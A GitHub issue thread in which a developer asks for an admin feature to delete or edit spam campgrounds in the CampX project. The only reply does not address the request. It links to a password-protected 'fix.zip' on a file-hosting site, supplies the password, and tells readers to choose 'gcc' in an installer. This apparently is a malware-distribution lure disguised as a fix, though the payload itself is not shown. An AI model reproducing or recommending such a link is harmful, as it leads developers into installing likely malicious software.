### ISSUE TITLE
[FEATURE] Add a Admin Feature

### ISSUE THREAD

**Issue by Vignesh025** [Vignesh025/CampX#3]
**Is your feature request related to a problem? Please describe.**
The admin needs to login to the database to delete the spam campgrounds.

**Describe the solution you'd like**
A feature for the admin of the project to delete or edit any campground.

**Describe alternatives you've considered**
Any other alternatives are also welcomed.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
